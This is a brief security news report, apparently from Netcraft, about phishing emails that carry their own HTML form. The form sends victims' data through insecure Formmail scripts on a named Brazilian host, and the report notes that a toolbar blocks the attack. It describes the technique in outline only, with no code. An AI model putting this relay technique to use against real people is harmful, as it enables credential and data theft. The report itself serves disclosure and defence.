Phishing typically collects data through a web site that imitates a bank or online retailer. By including the data collector in an HTML email, the new attack eliminates a step in the process, allowing phishing scams to steal sensitive information without constructing an elaborate fraudulent web site. The HTML form within the email lets phishers set the destination email address, allowing for easy re-routing of submissions as mailboxes are shut down.

The scam takes advantage of known insecurity in Formmail, a widely-used form-to-mail Perl script initially written in 1995. In early 2001, spammers began using Formmail to anonymously deliver massive volumes of spam, taking advantage of the Formmail’s failure to restrict access to the script. Most hosting providers have replaced the original Formmail with customized versions or secure replacement scripts like the NMS Project. The Brazilian hosting reseller involved in this incident, Hospedagem Empresarial (www.he.com.br), is an exception.

The Netcraft Anti-Phishing Toolbar is blocking this attack, as the toolbar can block access to insecure scripts being used inphishing attacks. The toolbar can be available for both Internet Explorer and Firefox.